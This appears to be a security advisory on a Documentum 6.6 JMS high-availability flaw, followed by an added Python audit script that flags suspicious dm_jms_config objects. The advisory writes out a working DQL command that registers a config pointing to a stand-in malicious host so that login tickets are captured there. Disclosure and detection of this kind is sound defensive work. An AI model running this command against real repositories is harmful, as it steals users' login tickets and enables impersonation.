Documentum security vulnerabilities: JMS HA feature

In the Documentum 6.6 release, EMC introduced a high-availability feature for JMS, and now any user is able to create a dm_jms_config object pointing to a malicious HTTP server and catch login tickets:

create dm_jms_config object 
set object_name='malicious JMS config',
set config_type=2,
append server_config_id=(select r_object_id from dm_server_config),
append servlet_name='do_bpm',
append base_uri='http://malicious_host:port/....',
append supported_protocol='http',
append projection_enable=TRUE,
append projection_proximity_value=1,
append projection_targets='malicious_host',
append projection_ports=0
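
A defensive check for the issue above, as an added example that is not part of the original post: it audits dm_jms_config rows exported from the repository and flags any whose creator is not a trusted administrator or whose base_uri or projection_targets point outside an allowlist of real JMS hosts. The host names, the `dmadmin` creator, the row layout and the use of the standard `r_creator_name` attribute are assumptions.

```python
from urllib.parse import urlsplit

# Assumptions (hypothetical values, not from the original post).
ALLOWED_JMS_HOSTS = {"cs01.example.internal", "cs02.example.internal"}
TRUSTED_CREATORS = {"dmadmin"}  # repository install owner

def _host(uri):
    """Return the lower-cased host of a base_uri, or None if it cannot be parsed."""
    try:
        return (urlsplit(uri).hostname or "").lower() or None
    except ValueError:
        return None

def audit_jms_configs(rows, allowed_hosts=ALLOWED_JMS_HOSTS, trusted=TRUSTED_CREATORS):
    """Return {object_name: [reasons]} for every dm_jms_config row needing review."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = {}
    for row in rows:
        reasons = []
        creator = row.get("r_creator_name")
        if creator not in trusted:
            reasons.append(f"created by untrusted user {creator!r}")
        # base_uri and projection_targets are repeating attributes (lists).
        for uri in row.get("base_uri", []):
            host = _host(uri)
            if host is None:
                reasons.append(f"unparsable base_uri {uri!r}")
            elif host not in allowed:
                reasons.append(f"base_uri host {host!r} not allowlisted")
        for target in row.get("projection_targets", []):
            if target.lower() not in allowed:
                reasons.append(f"projection target {target!r} not allowlisted")
        if reasons:
            findings[row["object_name"]] = reasons
    return findings

# Constructed sample rows, shaped like an export of dm_jms_config objects.
SAMPLE_ROWS = [
    {"object_name": "JMS cs01 for repo", "r_creator_name": "dmadmin",
     "base_uri": ["http://CS01.example.internal:9080/DmMethods/servlet/DoMethod"],
     "projection_targets": ["cs01.example.internal"]},
    {"object_name": "malicious JMS config", "r_creator_name": "jdoe",
     "base_uri": ["http://malicious_host:8080/x"],
     "projection_targets": ["malicious_host"]},
]

if __name__ == "__main__":
    for name, why in audit_jms_configs(SAMPLE_ROWS).items():
        print(name, "->", "; ".join(why))
```
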
